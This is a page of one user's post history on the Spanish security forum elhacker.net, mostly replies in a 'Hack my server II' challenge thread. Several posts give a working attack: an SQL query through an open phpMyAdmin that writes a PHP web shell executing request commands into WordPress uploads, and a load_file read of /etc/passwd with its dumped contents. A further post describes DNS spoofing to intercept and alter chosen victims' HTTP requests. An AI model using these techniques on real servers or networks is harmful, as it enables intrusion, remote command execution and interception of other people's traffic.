elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 25
51  Seguridad Informática / Hacking / Re: Hack my server II en: 2 Agosto 2014, 01:02 am
Cita de: WHK en  2 Agosto 2014, 00:53 am
Vamos, no era necesario subir una shell para acceder al sistema y ejecutar código, solo con el wordpress como está lo puedes hacer, de hecho nunca fue necesario ponerle un phpmyadmin, bastaba con las mismas fallas del wordpress, al ponerle ses phpmyadmin mataste la emoción.

Yaps por eso digo... pero si en teoria con las iSql de wordpress tambien se podria haber realizado. (O cualquier cosa que permitiese escribir).

PD: Alguien ha sufrido estress despues de utilizar un puto teclao peor que el de una blackberry?
52  Seguridad Informática / Hacking / Re: Hack my server II en: 2 Agosto 2014, 00:46 am
Pues a sido un poco lamer por que como esta el phpmyadmin abierto y puediendo meter sql a saco es facil.

Nada mas decir que has dado una carpeta con files he pensado en varias y ma dao por buscar la famosa uploads que no existia y de repente lista.

Despues desde phpmyadmin he metido la siguiente select:
Código
  1. SELECT '<?php if(isset($_REQUEST[\"cmd\"])){ $cmd = ($_REQUEST[\"cmd\"]);system($cmd);die;}?>'
  2. INTO OUTFILE  '/var/www/wp-content/uploads/c.php'

Lo que hace es crear un fichero php con el siguiente contenido:
Código
  1. <?php 
  2. if(isset($_REQUEST["cmd"])){
  3.    $cmd = ($_REQUEST["cmd"]);
  4.    system($cmd);
  5.    die;
  6. }
  7. ?>
  8.  

Y nada una cmd, que podria haber sido una c99 codeada o lo que quisiera... pero claro con phpmyadmin abierto y permisos de escritura.

Pero bueno antes de que pusieras permisos me tirao un rato intentando colar la libreria UDF pero no ha habido suerte... he creado las funciones base64 y copiado a tmp el lib*.so para despues intentar como pudiese apuntar que la carpeta de plugins de mysql fuera tmp pero nada :(
53  Seguridad Informática / Hacking / Re: Hack my server II en: 2 Agosto 2014, 00:30 am
Ya he copiado un un acceso a la shell

-> c.php?cmd=

SELECT '<?php if(isset($_REQUEST[\"cmd\"])){ $cmd = ($_REQUEST[\"cmd\"]);system($cmd);die;}?>'
INTO OUTFILE  '/var/www/wp-content/uploads/c.php'
54  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 20:22 pm
Cita de: #!drvy en  1 Agosto 2014, 20:09 pm
Buenas


Algo de progreso...

/etc/passwd - sin contraseñas :(
Código
  1. root:x:0:0:root:/root:/bin/bash
  2. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  3. bin:x:2:2:bin:/bin:/bin/sh
  4. sys:x:3:3:sys:/dev:/bin/sh
  5. sync:x:4:65534:sync:/bin:/bin/sync
  6. games:x:5:60:games:/usr/games:/bin/sh
  7. man:x:6:12:man:/var/cache/man:/bin/sh
  8. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  9. mail:x:8:8:mail:/var/mail:/bin/sh
  10. news:x:9:9:news:/var/spool/news:/bin/sh
  11. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  12. proxy:x:13:13:proxy:/bin:/bin/sh
  13. www-data:x:33:33:www-data:/var/www:/bin/sh
  14. backup:x:34:34:backup:/var/backups:/bin/sh
  15. list:x:38:38:Mailing List Manager:/var/list:/bin/s...
  16. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  17. gnats:x:41:41:Gnats Bug-Reporting System (admin):/...
  18. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  19. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  20. fetchmail:x:101:65534::/var/lib/fetchmail:/bin/fal...
  21. sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
  22. syslog:x:103:106::/home/syslog:/bin/false
  23. klog:x:104:107::/home/klog:/bin/false
  24. bind:x:105:109::/var/cache/bind:/bin/false
  25. smmta:x:106:110:Mail Transfer Agent,,,:/var/lib/se...
  26. smmsp:x:107:111:Mail Submission Program,,,:/var/li...
  27. landscape:x:108:112::/var/lib/landscape:/bin/false
  28. mysql:x:109:113:MySQL Server,,,:/nonexistent:/bin/.

Saludos


Usando el interprete sql de phpmyadmin
select load_file("/etc/passwd") from dual

Yo llevo rato leyendo files para ver si descubro algun path... he estado mirando por los *.conf de apache pero no encuentro nada pa pillar el path de la web.....
55  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 18:26 pm
Em esto aun sigue?
El reto era conseguir root en el server no?
O vale con el deface?
56  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 13:57 pm
Ya esta down esto o que? Pasar IP anda que cuando llegue a casale doy que toy en el curro jejeje.
57  Seguridad Informática / Hacking / Re: Forward http/s request. en: 30 Julio 2014, 18:47 pm
Cita de: falc0n en 29 Julio 2014, 23:45 pm
¿Te refieres a una vez llegado el paquete GET desde el equipo víctima al tuyo, cambiar los parámetros para redirigirlo al servidor original y que este devuelva un recurso distinto al solicitado sin que el cliente se de cuenta?

Un saludo


Exacto  ;D
58  Seguridad Informática / Hacking / Re: Forward http/s request. en: 29 Julio 2014, 21:16 pm
Solo tengo que cambiar el header GET de algunas peticiones http/s que me llegan. Se que con ettercap hay filtros y cositas pero no se si puede llegar a modificar los headers y aparte no me interesa spoofear todo el tráfico. Para eso monto un dns yo y asi solo cojo trafico de las peticiones dns y redirigo los sites que me interesan a mi ip, asi consigo hacer el man in the middle a lo que me interesa.
59  Foros Generales / Foro Libre / Re: Torneo Hack my Server en: 28 Julio 2014, 20:48 pm
Me uno al lio, espero tener time.
60  Foros Generales / Foro Libre / Re: Elección de estudios: ASIR o DAM en: 28 Julio 2014, 20:43 pm
Bueno yo al final he acabado DAM y tengo curro donde hice las practicas. Por si os pica la curiosidad toco aplicaciones web J2EE y también toco un poco de sistemas (entornos). Aparte de esto empiezo Telecos este año :) así puedo profundizar a capas más bajas que es lo que me gusta.
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 25
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines